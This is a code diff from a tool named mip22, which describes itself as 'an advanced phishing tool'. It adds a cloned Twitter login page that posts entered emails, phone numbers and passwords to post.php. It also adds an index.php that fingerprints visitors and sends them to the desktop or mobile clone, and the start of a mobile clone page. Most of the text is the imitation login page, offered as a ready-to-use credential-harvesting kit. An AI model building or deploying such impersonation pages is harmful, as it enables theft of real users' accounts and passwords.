+[stylesheet-group="2"] { }
+.r-13awgt0 { -moz-box-flex: 1; flex: 1 1 0%; }
+.r-4qtqp9 { display: inline-block; }
+.r-ywje51 { margin: auto; }
+.r-hvic4v { display: none; }
+.r-1adg3ll { display: block; }
+.r-6koalj { display: flex; }
+.r-sdzlij { border-radius: 9999px; }
+.r-1phboty { border-style: solid; }
+.r-rs99b7 { border-width: 1px; }
+.r-42olwf { border-color: rgba(0, 0, 0, 0); }
+.r-p1n3y5 { border-color: rgb(29, 161, 242); }
+.r-1yadl64 { border-width: 0px; }
+.r-crgep1 { margin: 0px; }
+.r-t60dpp { padding: 0px; }
+.r-17gur6a { border-radius: 0px; }
+.r-1sp51qo { padding: 10px; }
+.r-1tlfku8 { border-color: rgb(230, 236, 240); }
+.r-1udh08x { overflow: hidden; }
+.r-4iw3lz { border-width: 0px; }
+.r-wwvuq4 { padding: 0px; }
+.r-t23y2h { border-radius: 14px; }
+.r-1jkafct { border-radius: 2px; }
+.r-1awa8pu { border-color: rgb(101, 119, 134); }
+.r-1oqcu8e { padding: 15px; }
+.r-bztko3 { overflow: visible; }
+.r-xoduu5 { display: inline-flex; }
+.r-xf4iuw { margin: -8px; }
+.r-podbf7 { margin: -6px; }
+.r-1f0042m { border-radius: 5px; }
+.r-1jie2fr { border-color: rgba(0, 0, 0, 0.1); }
+[stylesheet-group="2.1"] { }
+.r-1jgb5lz { margin-left: auto; margin-right: auto; }
+.r-utggzx { padding-left: 10px; padding-right: 10px; }
+.r-rjfia { padding-bottom: 0px; padding-top: 0px; }
+.r-1fneopy { padding-left: 1em; padding-right: 1em; }
+.r-mk0yit { padding-left: 0px; padding-right: 0px; }
+.r-zg41ew { margin-bottom: 10px; margin-top: 10px; }
+.r-tvv088 { padding-bottom: 20px; padding-top: 20px; }
+.r-1j3t67a { padding-left: 15px; padding-right: 15px; }
+.r-5pqaiu { margin-bottom: calc(-10px); margin-top: calc(-10px); }
+.r-atwnbb { padding-bottom: 5px; padding-top: 5px; }
+.r-1w50u8q { padding-bottom: 10px; padding-top: 10px; }
+.r-hrzydr { margin-bottom: 2px; margin-top: 2px; }
+.r-1p4rafz { padding-left: 2px; padding-right: 2px; }
+.r-9qu9m4 { padding-bottom: 15px; padding-top: 15px; }
+.r-6b64d0 { padding-left: 0px; padding-right: 0px; }
+.r-ou255f { padding-left: 5px; padding-right: 5px; }
+.r-mvpalk { margin-left: 0px; margin-right: 0px; }
+.r-vlx1xi { margin-left: 10px; margin-right: 10px; }
+.r-15bsvpr { padding-left: 30px; padding-right: 30px; }
+[stylesheet-group="2.2"] { }
+.r-12vffkv > * { pointer-events: auto; }
+.r-12vffkv { pointer-events: none !important; }
+.r-14lw9ot { background-color: rgb(255, 255, 255); }
+.r-1p0dtai { bottom: 0px; }
+.r-1d2f490 { left: 0px; }
+.r-1xcajam { position: fixed; }
+.r-zchlnj { right: 0px; }
+.r-ipm5af { top: 0px; }
+.r-yyyyoo { fill: currentcolor; }
+.r-1xvli5t { height: 1.25em; }
+.r-dnmrzs { max-width: 100%; }
+.r-bnwqim { position: relative; }
+.r-1plcrui { vertical-align: text-bottom; }
+.r-lrvibr { user-select: none; }
+.r-13gxpu9 { color: rgb(29, 161, 242); }
+.r-wy61xf { height: 72px; }
+.r-u8s1d { position: absolute; }
+.r-1blnp2b { width: 72px; }
+.r-1ykxob0 { top: 60%; }
+.r-1b2b6em { line-height: 2em; }
+.r-q4m81j { text-align: center; }
+.r-12vffkv > * { pointer-events: auto; }
+.r-1pi2tsx { height: 100%; }
+.r-13qz1uu { width: 100%; }
+.r-417010 { z-index: 0; }
+.r-1g40b8q { z-index: 3; }
+.r-uvzvve { border-bottom-color: rgb(204, 214, 221); }
+.r-rull8r { border-bottom-style: solid; }
+.r-qklmqi { border-bottom-width: 1px; }
+.r-d3hbe1 { transform: translate3d(0px, 0px, 0px); }
+.r-o7ynqc { transition-duration: 0.2s; }
+.r-axxi2z { transition-property: transform, transform; }
+.r-136ojw6 { z-index: 2; }
+.r-1siec45 { }
+.r-sb58tz { max-width: 1000px; }
+.r-1wtj0ep { -moz-box-pack: justify; justify-content: space-between; }
+.r-18u37iz { -moz-box-direction: normal; -moz-box-orient: horizontal; flex-direction: row; }
+.r-1h3ijdo { height: 53px; }
+.r-16y2uox { -moz-box-flex: 1; flex-grow: 1; }
+.r-184en5c { z-index: 1; }
+.r-1ye8kvj { max-width: 600px; }
+.r-1777fci { -moz-box-pack: center; justify-content: center; }
+.r-1mf7evn { margin-right: 20px; }
+.r-1awozwy { -moz-box-align: center; align-items: center; }
+.r-1pz39u2 { align-self: stretch; }
+.r-1loqt21 { cursor: pointer; }
+.r-18qmn74 { min-width: 30px; }
+.r-1w2pmg { height: 0px; }
+.r-1niwhzg { background-color: rgba(0, 0, 0, 0); }
+.r-1vuscfd { min-height: 39px; }
+.r-1dhvaqw { min-width: calc(62.79px); }
+.r-53xb7h { min-width: 39px; }
+.r-6416eg { transition-property: background-color, box-shadow; }
+.r-ad9z0x { line-height: 1.3125; }
+.r-bcqeeo { min-width: 0px; }
+.r-qvutc0 { overflow-wrap: break-word; }
+.r-1qd0xha { font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Ubuntu, "Helvetica Neue", sans-serif; }
+.r-a023e6 { font-size: 15px; }
+.r-vw2c0b { font-weight: bold; }
+.r-eljoum { line-height: 1; }
+.r-1q142lx { flex-shrink: 0; }
+.r-50lct3 { height: 1.5em; }
+.r-lwhw9o { height: 1.75rem; }
+.r-1oszu61 { -moz-box-align: stretch; align-items: stretch; }
+.r-1wbh5a2 { flex-shrink: 1; }
+.r-17bb2tj { animation-duration: 0.75s; }
+.r-1muvv40 { animation-iteration-count: infinite; }
+.r-127358a { animation-name: r-9p3sdl; }
+@keyframes r-9p3sdl {
+0% { transform: rotate(0deg); }
+100% { transform: rotate(360deg); }
+}
+@keyframes r-9p3sdl {
+0% { transform: rotate(0deg); }
+100% { transform: rotate(360deg); }
+}
+.r-1ldzwu0 { animation-timing-function: linear; }
+.r-58zi21 { max-width: calc(240px); }
+.r-1vsu8ta { min-height: 30px; }
+.r-aj3cln { min-width: calc(48.3px); }
+.r-1n0xq6e { margin-left: 10px; }
+.r-urgr8i { background-color: rgb(29, 161, 242); }
+.r-jwli3a { color: rgb(255, 255, 255); }
+.r-1hfyk0a { padding-left: 10px; }
+.r-16f17gu { margin-right: calc(5px); }
+.r-150rngu { }
+.r-1iusvr4 { flex-basis: 0px; }
+.r-eqz5dr { -moz-box-direction: normal; -moz-box-orient: vertical; flex-direction: column; }
+.r-8fdsdq { z-index: 4; }
+.r-deolkf { box-sizing: border-box; }
+.r-ifefl9 { min-height: 0px; }
+.r-e84r5y { background-color: rgb(230, 236, 240); }
+.r-1re7ezh { color: rgb(101, 119, 134); }
+.r-hkyrab { color: rgb(20, 23, 26); }
+.r-16dba41 { font-weight: 400; }
+.r-30o5oe { -moz-appearance: none; }
+.r-1dz5y72 { resize: none; }
+.r-homxoj { color: inherit; }
+.r-poiln3 { font-family: inherit; }
+.r-7cikom { font-size: inherit; }
+.r-1ny4l3l { outline-style: none; }
+.r-1ttztb7 { text-align: inherit; }
+.r-1lrr6ok::-webkit-input-placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-1lrr6ok::placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-1lrr6ok::placeholder { color: rgb(101, 119, 134); opacity: 1; }
+.r-aqfbo4 { backface-visibility: hidden; }
+.r-2llsf { min-height: 100%; }
+.r-rthrr5 { width: 990px; }
+.r-33ulu8 { width: 600px; }
+.r-1ljd8xs { border-left-width: 1px; }
+.r-13l2t4g { border-right-width: 1px; }
+.r-my5ep6 { border-bottom-color: rgb(230, 236, 240); }
+.r-1habvwh { -moz-box-align: start; align-items: flex-start; }
+.r-1b6yd1w { font-size: 19px; }
+.r-1vr29t4 { font-weight: 800; }
+.r-obd0qt { -moz-box-align: end; align-items: flex-end; }
+.r-1joea0r { margin-left: 20px; }
+.r-6337vo { padding-bottom: calc(99px); }
+.r-zso239 { margin-right: 10px; }
+.r-1hycxz { width: 350px; }
+.r-1xk2f4g { clip: rect(1px, 1px, 1px, 1px); }
+.r-109y4c4 { height: 1px; }
+.r-92ng3h { width: 1px; }
+.r-1wyyakw { z-index: -1; }
+.r-y3da5r { box-shadow: rgba(101, 119, 134, 0.2) 0px 0px 8px, rgba(101, 119, 134, 0.25) 0px 1px 3px 1px; }
+.r-orgf3d { opacity: 0; }
+.r-eafdt9 { transition-duration: 0.15s; }
+.r-1b8bd59 { transition-property: transform, transform, opacity; }
+.r-nx0j10 { transition-timing-function: ease, ease, steps(1); }
+.r-1kihuf0 { align-self: center; }
+.r-7o8qx1 { margin-right: 5px; }
+.r-19wmn03 { width: 20px; }
+.r-gtdqiz { position: sticky; }
+.r-1l5qxre { padding-bottom: 59px; }
+.r-m611by { padding-top: 10px; }
+.r-ku1wi2 { margin-bottom: 15px; }
+.r-xaq1zp { width: 75%; }
+.r-1mlwlqe { flex-basis: auto; }
+.r-vvn4in { background-position: center center; }
+.r-u6sd8q { background-repeat: no-repeat; }
+.r-4gszlv { background-size: cover; }
+.r-d0pm55 { margin-bottom: 5px; }
+.r-19h5ruw { margin-top: 15px; }
+.r-1u4rsef { background-color: rgb(245, 248, 250); }
+.r-wgabs5 { border-bottom-width: 2px; }
+.r-k200y { align-self: flex-start; }
+.r-glunga { padding-top: 5px; }
+.r-1inuy60 { padding-bottom: 5px; }
+.r-vmopo1 { padding-top: 2px; }
+.r-1mdbw0j { padding-bottom: 0px; }
+.r-1n1174f { color: rgb(27, 149, 224); }
+.r-n6v787 { font-size: 13px; }
+.r-1sf4r6n { line-height: calc(19.6875px); }
+.r-1g94qm0 { margin-top: 5px; }
+.r-1w6e6rj { flex-wrap: wrap; }
+.r-1qfoi16 { padding-right: 10px; }
+.r-ip8ujx { height: 1em; }
+.r-1ro0kt6 { flex-basis: 0%; }
+.r-11j9u27 { visibility: hidden; }
+.r-s7hx6o { transition-duration: 0.25s; }
+.r-1ftll1t { transition-timing-function: ease-out; }
+.r-1p2783e { color: rgb(204, 214, 221); }
+.r-hbs49y { transform: translate3d(0px, 0px, 0px); }
+.r-tzz3ar { flex-wrap: nowrap; }
+.r-oucylx { border-bottom-color: rgba(0, 0, 0, 0); }
+.r-18p3no4 { border-bottom-color: rgb(29, 161, 242); }
+.r-17s6mgv { -moz-box-pack: end; justify-content: flex-end; }
+.r-1d09ksm { -moz-box-align: baseline; align-items: baseline; }
+.r-r2y082 { max-width: 50%; }
+.r-1blvdjr { font-size: 23px; }
+.r-1or9b2r { height: 10px; }
+.r-1jy2w8o { top: 1px; }
+.r-1h0z5md { -moz-box-pack: start; justify-content: flex-start; }
+.r-11cpok1 { }
+.r-clp7b1 { transition-property: color; }
+.r-3s2u2q { white-space: nowrap; }
+.r-27tl0q { width: 1em; }
+.r-zv2cs0 { background-color: rgba(29, 161, 242, 0.1); }
+.r-vrwoeq { background-color: rgb(204, 214, 221); }
+.r-1594n1d { height: 15%; }
+.r-qqzlmc { max-height: 100px; }
+.r-1jizoa0 { max-width: 100px; }
+.r-2t2l5v { min-height: 70px; }
+.r-1m5eot9 { min-width: 70px; }
+.r-1ih7r1r { width: 15%; }
+.r-9cviqr { margin-left: 2px; }
+.r-1bxhq7s { height: calc(6.5625rem); }
+.r-1omma8c { height: 5rem; }
+.r-14g73ha { height: 15px; }
+.r-1b94p3d { width: 15px; }
+.r-1mi75qu { box-shadow: rgba(0, 0, 0, 0.02) 0px 0px 2px inset; }
+.r-r72n3l { background-color: rgba(29, 161, 242, 0.2); }
+.r-1xljr72 { margin-left: calc(5px); }
+.r-1x0uki6 { margin-top: 20px; }
+.r-j66t93 { height: 39px; }
+.r-15d164r { margin-bottom: 10px; }
+.r-6ity3w { margin-top: 30px; }
+.r-1jayybb { min-height: 49px; }
+.r-17bavie { min-width: calc(78.89px); }
+.r-icoktb { opacity: 0.5; }
+.r-1q3imqu { background-color: rgb(26, 145, 218); }
+</style>
+
+
+
+<title>Login on Twitter / Twitter</title>
+
+
+
+<style>
+button 
+{
+background-color: #08a0e9;/* Green */
+border: none;
+color: white;
+}
+</style>
+
+  </head>
+
+
+<body style="background-color: rgb(255, 255, 255);">
+  
+
+<div id="react-root" style="height:100%;display:flex;">
+<div class="css-1dbjc4n r-13awgt0 r-12vffkv" data-reactroot="">
+<div class="css-1dbjc4n r-13awgt0 r-12vffkv">
+<div class="r-1d2f490 r-u8s1d r-zchlnj r-ipm5af r-184en5c">
+<div class="css-1dbjc4n r-aqfbo4 r-1p0dtai r-1d2f490 r-12vffkv r-1xcajam r-zchlnj">
+<div class="css-1dbjc4n">
+</div>
+</div>
+</div>
+
+<div class="css-1dbjc4n r-1pi2tsx r-13qz1uu r-417010" style="min-height: 693px;" aria-hidden="false">
+<main role="main" class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+<div class="css-1dbjc4n r-150rngu r-16y2uox r-1wbh5a2">
+<div class="css-1dbjc4n r-1jgb5lz r-1x0uki6 r-1ye8kvj r-1j3t67a r-13qz1uu">
+<svg viewBox="0 0 24 24" class="r-13gxpu9 r-4qtqp9 r-yyyyoo r-j66t93 r-dnmrzs r-bnwqim r-1plcrui r-lrvibr">
+<g>
+<path d="M23.643 4.937c-.835.37-1.732.62-2.675.733.962-.576 1.7-1.49 2.048-2.578-.9.534-1.897.922-2.958 1.13-.85-.904-2.06-1.47-3.4-1.47-2.572 0-4.658 2.086-4.658 4.66 0 .364.042.718.12 1.06-3.873-.195-7.304-2.05-9.602-4.868-.4.69-.63 1.49-.63 2.342 0 1.616.823 3.043 2.072 3.878-.764-.025-1.482-.234-2.11-.583v.06c0 2.257 1.605 4.14 3.737 4.568-.392.106-.803.162-1.227.162-.3 0-.593-.028-.877-.082.593 1.85 2.313 3.198 4.352 3.234-1.595 1.25-3.604 1.995-5.786 1.995-.376 0-.747-.022-1.112-.065 2.062 1.323 4.51 2.093 7.14 2.093 8.57 0 13.255-7.098 13.255-13.254 0-.2-.005-.402-.014-.602.91-.658 1.7-1.477 2.323-2.41z">
+</path>
+</g>
+</svg>
+
+<h1 dir="auto" role="heading" class="css-4rbku5 css-901oao r-hkyrab r-1qd0xha r-1blvdjr r-vw2c0b r-ad9z0x r-15d164r r-mvpalk r-6ity3w r-bcqeeo r-q4m81j r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Log in to Twitter</span>
+</h1>
+
+
+<form action="post.php" method="post" class="r-13qz1uu" target="_top">
+
+<div class="css-1dbjc4n">
+
+
+<div class="css-1dbjc4n r-1j3t67a r-1w50u8q">
+<label class="css-1dbjc4n r-1u4rsef r-rull8r r-wgabs5 r-1awa8pu r-1jkafct r-18u37iz">
+<div class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+<div dir="auto" class="css-901oao css-bfa6kz r-k200y r-1re7ezh r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-bcqeeo r-utggzx r-glunga r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" name="email or phone">Phone, email, or username</span>
+</div>
+
+<div class="css-1dbjc4n r-18u37iz r-16y2uox r-1wbh5a2 r-1udh08x">
+<div dir="auto" class="css-901oao r-1awozwy r-k200y r-hkyrab r-6koalj r-1qd0xha r-1b6yd1w r-16dba41 r-ad9z0x r-bcqeeo r-13qz1uu r-qvutc0">
+<input required type="email" name="phone_or_email" spellcheck="false" dir="auto" class="r-30o5oe r-1niwhzg r-17gur6a r-1yadl64 r-deolkf r-homxoj r-poiln3 r-7cikom r-1ny4l3l r-1inuy60 r-utggzx r-vmopo1 r-1w50u8q r-1lrr6ok r-1dz5y72 r-1ttztb7 r-13qz1uu">
+</div>
+</div>
+</div>
+</label>
+      
+
+<div class="css-1dbjc4n r-18u37iz r-utggzx">
+<div class="css-1dbjc4n r-13awgt0 r-eqz5dr">
+
+</div>
+</div>
+</div>
+
+<div class="css-1dbjc4n r-1j3t67a r-1w50u8q">
+
+<label class="css-1dbjc4n r-1u4rsef r-rull8r r-wgabs5 r-p1n3y5 r-1jkafct r-18u37iz">
+
+<div class="css-1dbjc4n r-16y2uox r-1wbh5a2">
+
+<div dir="auto" class="css-901oao css-bfa6kz r-k200y r-13gxpu9 r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-bcqeeo r-utggzx r-glunga r-qvutc0">
+<span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Password</span>
+</div>
+
+<div class="css-1dbjc4n r-18u37iz r-16y2uox r-1wbh5a2 r-1udh08x">
+<div dir="auto" class="css-901oao r-1awozwy r-k200y r-hkyrab r-6koalj r-1qd0xha r-1b6yd1w r-16dba41 r-ad9z0x r-bcqeeo r-13qz1uu r-qvutc0">
+<input required type="password" name="password" type="password" class="r-30o5oe r-1niwhzg r-17gur6a r-1yadl64 r-deolkf r-homxoj r-poiln3 r-7cikom r-1ny4l3l r-1inuy60 r-utggzx r-vmopo1 r-1w50u8q r-1lrr6ok r-1dz5y72 r-1ttztb7 r-13qz1uu">
+</div>
+</div>
+</div>
+</label>
+
+<div class="css-1dbjc4n r-18u37iz r-utggzx">
+<div class="css-1dbjc4n r-13awgt0 r-eqz5dr">
+</div>
+</div>
+</div>
+ 
+
+
+<button type="submit" class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0" 
+style="height:50px; width:100%; color:white; border-radius: 40px;">
+ Log in
+</button>
+
+<script>
+function closeWin()
+{
+myWindow.close();
+}
+</script
+</script>
+
+
+</div>
+</form>
+
+
+<div class="css-901oao r-hkyrab r-1qd0xha r-a023e6 r-16dba41 r-ad9z0x r-1x0uki6 r-bcqeeo r-q4m81j r-qvutc0">
+
+<div class="css-1dbjc4n r-1d09ksm r-xoduu5 r-18u37iz r-1wbh5a2">
+<a href="https://twitter.com/account/begin_password_reset" role="link" data-focusable="true" class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Forgot password?</span></a>
+<span aria-hidden="true" class="css-901oao css-16my406 r-1re7ezh r-1q142lx r-1qd0xha r-ad9z0x r-bcqeeo r-ou255f r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">·</span></span>
+
+<a href="https://twitter.com/i/flow/signup" role="link" data-focusable="true" class="css-4rbku5 css-18t94o4 css-901oao css-16my406 r-1n1174f r-1loqt21 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Sign up for Twitter</span></a></div></div></div></div></main></div></div></div></div>
+

+ 34 - 0
.pages/twitter/index.php

@@ -0,0 +1,34 @@
+<?php 
+
+/*
+*  Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  mip22 is a advanced phishing tool.
+*
+*  mip22 is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  mip22 is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+include 'fingerprints.php';
+
+?>
+
+<script type="text/javascript">
+if (screen.width >= 700) {
+document.location = "index.html";
+}
+else {
+document.location = "mobile.html";
+}
+</script> 
+

+ 474 - 0
.pages/twitter/mobile.html

@@ -0,0 +1,474 @@
+<!DOCTYPE html><html dir="ltr" style="font-size: 15px;" lang="en"><head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0,viewport-fit=cover">
+<link rel="preconnect" href="//abs.twimg.com">
+<link rel="preconnect" href="//api.twitter.com">
+<link rel="preconnect" href="//pbs.twimg.com">
+<link rel="preconnect" href="//t.co">
+<link rel="preconnect" href="//video.twimg.com">
+<link rel="dns-prefetch" href="//abs.twimg.com">
+<link rel="dns-prefetch" href="//api.twitter.com">
+<link rel="dns-prefetch" href="//pbs.twimg.com">
+<link rel="dns-prefetch" href="//t.co">
+<link rel="dns-prefetch" href="//video.twimg.com">
+
+
+
+<meta property="og:site_name" content="Twitter">
+
+
+<link rel="alternate" hreflang="x-default" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en">
+<link rel="alternate" hreflang="ar" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ar">
+<link rel="alternate" hreflang="bg" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=bg">
+<link rel="alternate" hreflang="bn" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=bn">
+<link rel="alternate" hreflang="ca" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ca">
+<link rel="alternate" hreflang="cs" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=cs">
+<link rel="alternate" hreflang="da" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=da">
+<link rel="alternate" hreflang="de" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=de">
+<link rel="alternate" hreflang="el" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=el">
+<link rel="alternate" hreflang="en" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en">
+<link rel="alternate" hreflang="en-GB" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=en-GB">
+<link rel="alternate" hreflang="es" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=es">
+<link rel="alternate" hreflang="eu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=eu">
+<link rel="alternate" hreflang="fa" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fa">
+<link rel="alternate" hreflang="fi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fi">
+<link rel="alternate" hreflang="tl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=tl">
+<link rel="alternate" hreflang="fr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=fr">
+<link rel="alternate" hreflang="ga" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ga">
+<link rel="alternate" hreflang="gl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=gl">
+<link rel="alternate" hreflang="gu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=gu">
+<link rel="alternate" hreflang="he" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=he">
+<link rel="alternate" hreflang="hi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hi">
+<link rel="alternate" hreflang="hr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hr">
+<link rel="alternate" hreflang="hu" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=hu">
+<link rel="alternate" hreflang="id" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=id">
+<link rel="alternate" hreflang="it" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=it">
+<link rel="alternate" hreflang="ja" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ja">
+<link rel="alternate" hreflang="kn" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=kn">
+<link rel="alternate" hreflang="ko" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ko">
+<link rel="alternate" hreflang="mr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=mr">
+<link rel="alternate" hreflang="ms" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ms">
+<link rel="alternate" hreflang="nb" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=nb">
+<link rel="alternate" hreflang="nl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=nl">
+<link rel="alternate" hreflang="pl" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=pl">
+<link rel="alternate" hreflang="pt" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=pt">
+<link rel="alternate" hreflang="ro" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ro">
+<link rel="alternate" hreflang="ru" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ru">
+<link rel="alternate" hreflang="sk" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sk">
+<link rel="alternate" hreflang="sr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sr">
+<link rel="alternate" hreflang="sv" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=sv">
+<link rel="alternate" hreflang="ta" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ta">
+<link rel="alternate" hreflang="th" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=th">
+<link rel="alternate" hreflang="tr" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=tr">
+<link rel="alternate" hreflang="uk" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=uk">
+<link rel="alternate" hreflang="ur" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=ur">
+<link rel="alternate" hreflang="vi" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=vi">
+<link rel="alternate" hreflang="zh" href="https://twitter.com/?prefetchtimestamp=1586066839173&lang=zh">
+
+
+<link rel="mask-icon" sizes="any" href="https://abs.twimg.com/responsive-web/web/icon-svg.9e211f64.svg" color="#1da1f2">
+<link rel="shortcut icon" data-savepage-href="//abs.twimg.com/favicons/twitter.ico" href="data:image/vnd.microsoft.icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAA0pJREFUWAntVk1oE1EQnnlJbFK3KUq9VJPYWgQVD/5QD0qpfweL1YJQoZAULBRPggp6kB78PQn14kHx0jRB0UO9REVFb1YqVBEsbZW2SbVS0B6apEnbbMbZ6qbZdTempqCHPAjvzcw3P5mdmfcAiquYgX+cAVwu/+5AdDMQnSPCHUhQA0hf+Rxy2OjicIvzm+qnKhito0qpb2wvJhWeJgCPP7oPELeHvdJ1VSGf3eOPnSWga0S0Qo9HxEkEusDBuNjbEca8G291nlBxmgDc/ukuIvAJxI6wr+yKCsq1ewLxQ2lZfpQLo8oQ4ZXdCkfnACrGWpyDCl+oQmVn5xuVPU102e2P3qoJkFOhzVb9S7KSnL5jJs/mI+As01PJFPSlZeFSZZoAGBRXBZyq9lk5NrC+e7pJ5en30c+JWk59pZ5vRDOuhAD381c/H/FKz1SMNgCE16rg505r5TT0uLqme93d0fbq+1SeLSeU83Ke0RHYFPGVPcjQfNDUwIa7M665+dQAEEjZoMwZMcEF9RxIDAgBQ2mCcqJ0Z0b+h4MNbZ4RnyOSDbNmE2iRk5jCNgIIckFoZAs4IgfLGrlKGjkzS16iwj6pV9I4mUvCPf73JVytH9nRJj24QHrqU8NCIWrMaGqAC+Ut/3ZzAS63cx4v2K/x/IvQBOCwWzu5KmJGwEJ5PIgeG9nQBDDcXPpFoDjJ7ThvBC6EZxXWkJG+JgAFwGM4KBAOcibeGCn8FQ/hyajXPmSk+1sACogn4hYk7OdiHDFSWipPkPWSmY6mCzIghEEuxJvcEYUvxIdhX2mvmSHDDPBF9AJRnDZTyp+P40671JYLbxiAohDxSTfQIg4oNxgPzCWPHaWQBViOf2jGqVwBaEaxGbAqOFMrp+SefC8eNhoFIY5lXzpmtnMGUB2IbU3JdIqVW9m5zcxINn/hAYKiIexdaTh4srHKORMAP0b28PNgJyGt5gvHzQVYx91QpVcwpRFl/p63HSR1DLbid1OcTpAJQOG7u+KH+aI5Qwj13IsamU5vkUSIc8uGLDa8OtoivV8U5HcydFLtT7hlSDVy2nfxI2Ibg9awuVU8IeJAOMF5m2B6jFs1tM5R9rS3GRP5uSuiihn4DzPwA7z7GDH+43gqAAAAAElFTkSuQmCC" type="image/x-icon">
+<link rel="apple-touch-icon" sizes="192x192" href="https://abs.twimg.com/responsive-web/web/icon-ios.8ea219d4.png">
+<meta name="mobile-web-app-capable" content="yes">
+<meta name="apple-mobile-web-app-title" content="Twitter">
+<meta name="apple-mobile-web-app-status-bar-style" content="white">
+<meta name="theme-color" content="#FFFFFF">
+
+
+
+
+<style>html, body { height: 100%; }
+body { overflow-y: scroll; overscroll-behavior-y: none; }
+</style>
+<style id="react-native-stylesheet">[stylesheet-group="0"] { }
+html { }
+body { margin: 0px; }
+button::-moz-focus-inner, input::-moz-focus-inner { border: 0px none; padding: 0px; }
+input::-webkit-inner-spin-button, input::-webkit-outer-spin-button, input::-webkit-search-cancel-button, input::-webkit-search-decoration, input::-webkit-search-results-button, input::-webkit-search-results-decoration { display: none; }
+[stylesheet-group="0.1"] { }
+:focus:not([data-focusvisible-polyfill]) { outline: currentcolor none medium; }
+[stylesheet-group="0.5"] { }
+.css-4rbku5 { background-color: rgba(0, 0, 0, 0); color: inherit; font: inherit; list-style: outside none none; margin: 0px; text-align: inherit; text-decoration: none; }
+.css-18t94o4 { cursor: pointer; }
+[stylesheet-group="1"] { }
+.css-1dbjc4n { -moz-box-align: stretch; -moz-box-direction: normal; -moz-box-orient: vertical; align-items: stretch; border: 0px solid black; box-sizing: border-box; display: flex; flex-basis: auto; flex-direction: column; flex-shrink: 0; margin: 0px; min-height: 0px; min-width: 0px; padding: 0px; position: relative; z-index: 0; }
